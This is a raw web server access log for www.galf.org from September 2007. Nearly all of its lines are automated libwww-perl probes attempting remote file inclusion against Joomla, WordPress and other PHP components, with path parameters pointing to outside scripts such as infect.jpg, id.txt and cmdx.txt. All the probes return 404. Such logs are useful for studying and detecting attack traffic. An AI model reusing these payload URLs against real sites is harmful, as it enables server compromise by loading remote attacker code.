66.246.218.186 - - [23/Sep/2007:18:43:58 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:43:59 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.246.218.186 - - [23/Sep/2007:18:44:00 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
62.75.193.39 - - [23/Sep/2007:18:45:04 -0700] "GET /logs/access_070827.log//cacti/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://contenido.dreihausen.de//GABCZUG/agicmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.39 - - [23/Sep/2007:18:45:04 -0700] "GET //cacti/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://contenido.dreihausen.de//GABCZUG/agicmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.75.193.39 - - [23/Sep/2007:18:45:05 -0700] "GET /logs//cacti/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://contenido.dreihausen.de//GABCZUG/agicmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:18:45:10 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:18:45:10 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:45:28 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:45:30 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:45:31 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
67.18.16.82 - - [23/Sep/2007:18:45:31 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:47:18 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:47:19 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
83.246.114.18 - - [23/Sep/2007:18:47:59 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.246.114.18 - - [23/Sep/2007:18:47:59 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
122.152.129.53 - - [23/Sep/2007:18:48:15 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Baiduspider+(+http://www.baidu.com/search/spider_jp.html)" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:33 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:33 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:33 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:33 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:34 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:48:34 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:49:04 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:49:04 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:49:05 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:49:12 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
24.132.116.239 - - [23/Sep/2007:18:49:12 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:49:12 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:49:26 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.36.128.82 - - [23/Sep/2007:18:49:31 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.36.128.82 - - [23/Sep/2007:18:49:31 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:49:36 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:49:36 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:49:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:50:25 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:50:32 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:50:38 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:50:39 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:50:44 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:46 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:46 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:46 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:46 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:46 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:47 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:48 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.218.186 - - [23/Sep/2007:18:50:49 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:50:53 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:50:53 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
195.37.203.229 - - [23/Sep/2007:18:50:53 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:50:57 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:50:58 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.246.114.18 - - [23/Sep/2007:18:51:18 -0700] "GET /logs/access_070903.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:51:20 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:51:21 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.136.24.209 - - [23/Sep/2007:18:51:53 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.136.24.209 - - [23/Sep/2007:18:51:59 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:52:03 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:52:03 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /logs/access_070910.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:52:17 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
81.19.98.206 - - [23/Sep/2007:18:52:33 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:18:52:33 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:18:52:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.19.98.206 - - [23/Sep/2007:18:52:34 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:18:52:48 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:18:52:49 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:18:52:49 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:53:32 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:18:53:35 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:54:18 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.246.39.80 - - [23/Sep/2007:18:54:19 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:18:54:33 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:54:39 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
195.37.203.229 - - [23/Sep/2007:18:54:39 -0700] "GET /logs/access_070806.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
61.205.60.84 - - [23/Sep/2007:18:54:59 -0700] "GET /modules/xfsection/modify.php?dir_module=http://www.tarcisiobr.kit.net/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.802" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:55:03 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:55:04 -0700] "GET /modules/My_eGallery/index.php?basepath=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:18:55:08 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.214.68.207 - - [23/Sep/2007:18:55:25 -0700] "GET /logs/access_070827.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:55:56 -0700] "GET /logs/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.18.16.82 - - [23/Sep/2007:18:55:56 -0700] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://www.infectsgroup.kit.net/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.103.186.99 - - [23/Sep/2007:18:57:42 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.186.99 - - [23/Sep/2007:18:57:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.103.186.99 - - [23/Sep/2007:18:57:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.246.114.18 - - [23/Sep/2007:18:57:46 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.246.114.18 - - [23/Sep/2007:18:57:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.freewebs.com/halajaeira/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.113.86.3 - - [23/Sep/2007:18:58:12 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.113.86.3 - - [23/Sep/2007:18:58:13 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.37.50.43 - - [23/Sep/2007:18:58:49 -0700] "GET //skin/zero_vote/error.php?dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:59:35 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:59:36 -0700] "GET /modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:18:59:36 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.55.208.233 - - [23/Sep/2007:19:00:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.208.233 - - [23/Sep/2007:19:00:07 -0700] "GET /labia/?N=A HTTP/1.0" 200 508 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:19:00:10 -0700] "GET /logs/access_070827.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
143.225.151.30 - - [23/Sep/2007:19:00:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.bries.biz/media/cmdx.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:11 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:11 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:11 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:11 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:12 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.36.128.82 - - [23/Sep/2007:19:00:12 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:00:15 -0700] "GET /logs/access_070827.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.132.116.239 - - [23/Sep/2007:19:00:59 -0700] "GET /logs/access_070618.log/modules/My_eGallery/index.php?basepath=http://teamwork.dropyour.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
